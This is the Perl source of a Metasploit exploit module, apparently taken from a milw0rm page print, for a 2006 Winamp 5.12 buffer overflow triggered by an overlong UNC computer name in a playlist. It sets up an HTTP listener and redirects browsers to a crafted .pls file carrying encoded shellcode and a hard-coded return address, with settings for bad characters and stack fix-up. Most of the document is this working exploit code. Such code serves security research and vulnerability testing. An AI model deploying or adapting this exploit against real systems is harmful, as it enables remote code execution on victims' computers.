
Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta

  2    ##
  3    # This file is part of the Metasploit Framework and may be redistributed
  4    # according to the licenses defined in the Authors field below. In the
  5    # case of an unknown or missing license, this file defaults to the same
  6    # license as the core Framework (dual GPLv2 and Artistic). The latest
  7    # version of the Framework can always be obtained from metasploit.com.
  8    ##
  10   package Msf::Exploit::winamp_playlist_unc;
  12   use   strict;
  13   use   base "Msf::Exploit";
  14   use   Pex::Text;
  15   use   IO::Socket::INET;
  16   use   IPC::Open3;
  18    my $advanced =
  19     {
  20           ’Gzip’           => [1, ’Enable gzip content encoding’],
  21           ’Chunked’        => [1, ’Enable chunked transfer encoding’],
  22           ’Humor’           => [0, ’Enable humorous song names’],
  23     };
# Module metadata handed to Msf::Exploit by new().
my $info =
  {
        'Name'         => 'Winamp Playlist UNC Path Computer Name Overflow',
        'Version'      => '$Revision: 1.3 $',
        'Authors'      =>
          [
                'H D Moore <hdm [at] metasploit.com',
                'Faithless <rhyskidd [at] gmail.com>',
          ],

        'Description'  =>
          Pex::Text::Freeform(qq{
                This module exploits a vulnerability in the Winamp media player.
          This flaw is triggered when a audio file path is specified, inside a
          playlist, that consists of a UNC path with a long computer name. This
          module delivers the playlist via the browser.
}),

        'Arch'         => [ 'x86' ],
        'OS'           => [ 'win32', 'winxp', 'win2003' ],
        'Priv'         => 0,

        'AutoOpts'     => { 'EXITFUNC' => 'process' },
        # Each entry is [flag, type, description, default]; the meaning of the
        # leading flag is defined by Msf::Exploit and not shown in this file.
        'UserOpts'     =>
          {
                'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
                'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
                'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
          },

        'Payload'      =>
          {
                # 526 keeps the encoded payload short of offset 1022, where
                # HandleHttpClient writes the target return address.
                'Space'    => 526,
                # Bytes the encoder must avoid: NUL, "\", "/", LF, CR and
                # space -- presumably those that would terminate or split
                # the UNC path component carrying the payload.
                'BadChars' => "\x00\x5c\x2f\x0a\x0d\x20",
                'Keys'     => ['-bind'],

                # Landing on \x5c\x5c trashes esp, restore from ecx
                # ("\x87\xe1" is x86 xchg ecx, esp)
                'PrependEncoder' => "\x87\xe1",

                # Disable nop sleds completely (dont modify ecx)
                'MinNops' => 0,
                'MaxNops' => 0,
          },
        'Refs'         =>
          [
                ['BID', '16410'],
                ['URL', 'http://milw0rm.com/id.php?id=1458/'],
                ['URL', 'http://secunia.com/advisories/18649/'],
          ],

        'DefaultTarget' => 0,
        'Targets'      =>
          [
                # Return to exe, 0x0d is replaced by 0x00 >:-)
                [ 'Winamp 5.12 Universal', 0x0d45fece ]
          ],

        'Keys'         => [ 'winamp' ],

        'DisclosureDate' => 'Jan 29 2006',
  };
  87    sub new {
  88            my $class = shift;
  89            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
  90            return($self);
  91    }
  93    sub Exploit
  94    {
  95            my $self = shift;
  96            my $server = IO::Socket::INET−>new(
  97                    LocalHost => $self−>GetVar(’HTTPHOST’),
  98                    LocalPort => $self−>GetVar(’HTTPPORT’),
  99                    ReuseAddr => 1,
  100                   Listen    => 1,
  101                   Proto     => ’tcp’
  102               );
  103           my $client;
  104

H D Moore                                                                                        01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                                           Page 3/6
  105           # Did the listener create fail?
  106           if (not defined($server)) {
  107                   $self−>PrintLine("[−] Failed to create local HTTP listener on " . $self−>GetVar(’HTTPPORT’));
  108                   return;
  109           }
  110
  111           my $httphost = $self−>GetVar(’HTTPHOST’);
  112           $httphost = Pex::Utils::SourceIP(’1.2.3.4’) if $httphost eq ’0.0.0.0’;
  113
  114           $self−>PrintLine("[*] Waiting for connections to http://". $httphost .":". $self−>GetVar(’HTTPPORT’) ."/");
  115
  116           while (defined($client = $server−>accept())) {
  117                   $self−>HandleHttpClient(Msf::Socket::Tcp−>new_from_socket($client));
  118           }
  119
  120           return;
  121   }
# Serve one HTTP client on $fd (an Msf::Socket::Tcp wrapper around the
# accepted socket).  A request whose URL lacks ".pls" is answered with a
# small HTML page whose script redirects to a random ".pls" path; a ".pls"
# request is answered with the generated playlist (audio/x-scpls).  The
# socket is closed before returning in both cases.
sub HandleHttpClient
{
        my $self = shift;
        my $fd     = shift;

        # Set the remote host information
        my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

        # Read the HTTP command.  NOTE(review): an empty or malformed request
        # line leaves $url undef, which the test below treats as "not .pls"
        # and answers with the redirect page.
        my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

        # Read the HTTP headers; they are accumulated but never inspected.
        my $headers;
        while ( (my $line = $fd->RecvLine(10))) {
                $headers .= $line;
                last if $line eq "\r\n";
        }

        # First visit: redirect the browser to a random ".pls" URL
        if ($url !~ /\.pls/i) {
                $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
                my $content =
                        "<html><script>".
                        "document.location='".RandomPath().".pls'".
                        "</script><body>".
                        "One second please...</body></html>";

                $fd->Send($self->BuildResponse($content));
                $fd->Close;
                return;
        }

        my $target_idx      = $self->GetVar('TARGET');
        my $target          = $self->Targets->[$target_idx];
        my $shellcode       = $self->GetVar('EncodedPayload')->Payload;

        # Random title for the overflowing entry (1..32 alphanumerics)
        my $name = Pex::Text::AlphaNumText(int(rand(32)+1));
        # 1026-byte alphanumeric "computer name": the target's return address
        # (little-endian, pack 'V') at offset 1022, the encoded payload at 0.
        my $file = Pex::Text::AlphaNumText(1026);

        substr($file, 1022, 4, pack('V', $target->[1]));
        substr($file, 0, length($shellcode), $shellcode);

        # Too many and it takes too long to load...
        my $pcnt = int(rand(10)+10);
        # PLS playlist: $pcnt filler entries from RandomNames followed by the
        # overflowing UNC entry as entry $pcnt+1.  The oversized "\\<name>"
        # File= line is the on-the-wire indicator of this module's output.
        my $play =
                "[playlist]\r\n".

                            $self->RandomNames($pcnt).

                            "File".   ($pcnt+1). "=\\\\$file\r\n" .
                            "Title". ($pcnt+1). "=$name\r\n".
                            "Length". ($pcnt+1). "=".sprintf("%x",rand(1024)+1)."\r\n".

                            "NumberOfEntries=".($pcnt+1)."\r\n".
                            "Version=2\r\n";

        $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");


        $fd->Send($self->BuildResponse($play, "audio/x-scpls"));

        # Prevents IE from throwing an error in some cases
        select(undef, undef, undef, 0.1);

        $fd->Close();
}
  189   sub RandomPath {
  190           my $self = shift;
  191           my $path;
  192
  193           while (length($path) < 32) {
  194                   $path .= "/" . Pex::Text::AlphaNumText(int(rand(30) + 5));
  195           }
  196           return $path;
  197   }
  199   sub RandomNames {
  200           my $self = shift;
  201           return $self−>RandomNamesFun(@_) if $self−>GetVar(’Humor’);
  202           my $scnt = shift;
  203
  204           my $ppad = ’’;
  205
  206           for my $idx (1..$scnt) {
  207                   my $pname = Pex::Text::AlphaNumText(int(rand(32)+1));
  208                   my $pfile = Pex::Text::AlphaNumText(int(rand(32)+1)).".mp3";
H D Moore                                                                                                                               01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta           Page 5/6
  209                     $ppad .=
  210                             "File".    ($idx). "=".$pfile."\r\n" .
  211                             "Title". ($idx). "=".$pname."\r\n".
  212                              "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  213           }
  214           return $ppad;
  215   }
  217   sub BuildResponse {
  218            my ($self, $content, $ctype) = @_;
  219            $ctype ||= "text/html";
  220
  221           my $response =
  222             "HTTP/1.1 200 OK\r\n" .
  223             "Content−Type: $ctype\r\n";
  224
  225           if ($self−>GetVar(’Gzip’)) {
  226                    $response .= "Content−Encoding: gzip\r\n";
  227                    $content = $self−>Gzip($content);
  228           }
  229           if ($self−>GetVar(’Chunked’)) {
  230                    $response .= "Transfer−Encoding: chunked\r\n";
  231                    $content = $self−>Chunk($content);
  232           } else {
  233                    $response .= ’Content−Length: ’ . length($content) . "\r\n" .
  234                      "Connection: close\r\n";
  235           }
  236
  237           $response .= "\r\n" . $content;
  238
  239           return $response;
  240   }
  242   sub Chunk {
  243           my ($self, $content) = @_;
  244
  245           my $chunked;
  246           while (length($content)) {
  247                   my $chunk = substr($content, 0, int(rand(10) + 1), ’’);
  248                   $chunked .= sprintf(’%x’, length($chunk)) . "\r\n$chunk\r\n";
  249           }
  250           $chunked .= "0\r\n\r\n";
  251
  252           return $chunked;
  253   }
# Compress $data with the external gzip binary via IPC::Open3 and return
# the compressed stream as a single string.
#
# NOTE(review): $err is passed to open3 undefined, so per IPC::Open3 the
# child's STDERR shares the $rdr handle -- any gzip diagnostic would be
# returned inside the "compressed" body.  $pid is never reaped with
# waitpid, so each call leaves a zombie until this process exits.
sub Gzip {
        my $self = shift;
        my $data = shift;
        # Yields a level argument of "-10".."-14"; gzip documents -1..-9, so
        # this looks like it relies on gzip's option parsing -- TODO confirm.
        my $comp = int(rand(5))+10;

        my($wtr, $rdr, $err);

        # List-form open3: arguments go straight to gzip, no shell involved
        my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
        print $wtr $data;
        close ($wtr);
        local $/;   # slurp mode so the readline below returns everything

        return (<$rdr>);
}
  271   sub RandomNamesFun {
  272           my $self = shift;
  273           my $scnt = shift;
  274           my @ffun =
  275           (
  276                   "Angelina vs Rosie O − Butter Time",
  277                   "Richards Gerbil Adventure",
  278                   "Elton John Bachelor Party",
  279                   "Paris Hilton Greased Chihuahua",
  280                   "OH MY GOD",
  281                   "SOMEONE IS OWNING",
  282                   "MY WINAMP!",
  283           );
  284
  285            my $ppad = ’’;
  286
  287            for my $idx (1..$scnt) {
  288                    my $pname = $ffun[ $idx % scalar(@ffun) ];
  289                    $ppad .=
  290                            "File".    ($idx). "=".$pname."\r\n" .
  291                            "Title". ($idx). "=".$pname."\r\n".
  292                             "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  293            }
  294            return $ppad;
  295   }
  296   1;
  298   # milw0rm.com [2006−01−31]



